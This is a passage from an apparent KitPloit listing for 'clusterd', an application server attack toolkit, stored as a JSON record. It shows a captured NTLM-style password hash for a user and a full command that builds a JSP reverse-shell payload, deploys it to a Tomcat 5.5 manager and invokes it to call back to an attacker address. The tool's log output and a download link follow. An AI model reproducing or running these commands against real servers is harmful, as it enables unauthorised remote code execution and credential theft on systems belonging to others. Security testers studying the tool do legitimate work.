bryan::bryan-PC:1122334455667788:34826253d353ebca4811bd08be0db067:01010000000000003dac35999f78cf019df7c49c7268a5f600000000020000000000000000000000\n [2014-05-25 11:01PM] Finished at 2014-05-25 11:01PM\n\ntomcat deployment and reverse shell invocation \n\n \n \n $ ./clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows\n \n clusterd/0.3 - clustered attack toolkit\n [Supporting 6 platforms]\n \n [2014-05-25 10:53PM] Started at 2014-05-25 10:53PM\n [2014-05-25 10:53PM] Generating payload....\n [2014-05-25 10:53PM] Payload generated (shell.war). Payload: java/jsp_shell_reverse_tcp\n [2014-05-25 10:53PM] Servers' OS hinted at windows\n [2014-05-25 10:53PM] Fingerprinting host '192.168.1.105'\n [2014-05-25 10:53PM] Server hinted at 'tomcat'\n [2014-05-25 10:53PM] Checking tomcat version 5.5 Tomcat...\n [2014-05-25 10:53PM] Checking tomcat version 5.5 Tomcat Manager...\n [2014-05-25 10:53PM] Matched 2 fingerprints for service tomcat\n [2014-05-25 10:53PM] Tomcat (version 5.5)\n [2014-05-25 10:53PM] Tomcat Manager (version 5.5)\n [2014-05-25 10:53PM] Fingerprinting completed.\n [2014-05-25 10:53PM] Preparing to deploy /tmp/.clusterd/z1dgi.war...\n [2014-05-25 10:53PM] Deployed /tmp/.clusterd/z1dgi.war to /z1dgi\n [2014-05-25 10:53PM] z1dgi invoked at 192.168.1.105\n [2014-05-25 10:53PM] Finished at 2014-05-25 10:53PM\n\n \n \n\n\n** [ Download clusterd ](<https://github.com/hatRiot/clusterd>) **\n", "modified": "2017-09-25T21:04:00", "published": "2017-09-25T21:04:00", "id": "KITPLOIT:1152821557938719018", "href": "http://www.kitploit.com/2017/09/clusterd-application-server-attack.html", "title": "clusterd - Application Server Attack Toolkit", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}